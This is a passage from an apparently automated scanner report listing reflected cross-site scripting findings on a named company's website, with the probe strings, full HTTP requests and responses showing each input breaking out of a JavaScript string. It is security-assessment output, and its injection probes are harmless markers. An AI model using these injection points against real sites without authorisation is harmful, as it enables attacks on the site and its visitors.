The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddf82"%3b5ee4db7527a was submitted in the REST URL parameter 3. This input was echoed as ddf82";5ee4db7527a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/ddf82"%3b5ee4db7527a HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:42 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/ddf82";5ee4db7527a";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.446. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 925a2'%3b422a594066 was submitted in the REST URL parameter 3. This input was echoed as 925a2';422a594066 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/925a2'%3b422a594066 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news/925a2';422a594066'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.447. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ded3"%3b76597243304 was submitted in the REST URL parameter 1. This input was echoed as 6ded3";76597243304 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about6ded3"%3b76597243304/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:53 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40782
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about6ded3";76597243304/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VA
...[SNIP]...

1.448. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c38e1'%3b2f13d89ce12 was submitted in the REST URL parameter 1. This input was echoed as c38e1';2f13d89ce12 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutc38e1'%3b2f13d89ce12/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:12 GMT
Content-Type: text/html
Content-Length: 40782
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/aboutc38e1';2f13d89ce12/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.lengt
...[SNIP]...

1.449. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46557"%3b7e2cf0b425e was submitted in the REST URL parameter 2. This input was echoed as 46557";7e2cf0b425e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news46557"%3b7e2cf0b425e/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47243
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news46557";7e2cf0b425e/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABL
...[SNIP]...

1.450. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ace7d'%3bbe4e952746 was submitted in the REST URL parameter 2. This input was echoed as ace7d';be4e952746 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsace7d'%3bbe4e952746/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:50 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47241
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/newsace7d';be4e952746/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.451. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f734"%3b0d104c71a43 was submitted in the REST URL parameter 3. This input was echoed as 4f734";0d104c71a43 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/4f734"%3b0d104c71a43 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:25 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/4f734";0d104c71a43";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.452. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1dc1'%3b4e4a7d059be was submitted in the REST URL parameter 3. This input was echoed as c1dc1';4e4a7d059be in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/c1dc1'%3b4e4a7d059be HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news/c1dc1';4e4a7d059be'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.453. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/presskits/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40bb4"%3b00d2ec15f9b was submitted in the REST URL parameter 1. This input was echoed as 40bb4";00d2ec15f9b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about40bb4"%3b00d2ec15f9b/news/presskits/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:46 GMT
Content-Type: text/html
Content-Length: 40642
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about40bb4";00d2ec15f9b/news/presskits/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.454. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/presskits/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ee0c'%3be78c00dffdb was submitted in the REST URL parameter 1. This input was echoed as 6ee0c';e78c00dffdb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about6ee0c'%3be78c00dffdb/news/presskits/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40642
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about6ee0c';e78c00dffdb/news/presskits/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.455. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/presskits/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35152"%3ba0bf920797 was submitted in the REST URL parameter 2. This input was echoed as 35152";a0bf920797 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news35152"%3ba0bf920797/presskits/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:30 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47101
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news35152";a0bf920797/presskits/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.456. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/presskits/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36b89'%3b2db83c22046 was submitted in the REST URL parameter 2. This input was echoed as 36b89';2db83c22046 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news36b89'%3b2db83c22046/presskits/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47103
Date: Wed, 17 Nov 2010 00:51:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news36b89';2db83c22046/presskits/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.457. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/presskits/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58b31"%3bde6ac351f01 was submitted in the REST URL parameter 3. This input was echoed as 58b31";de6ac351f01 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

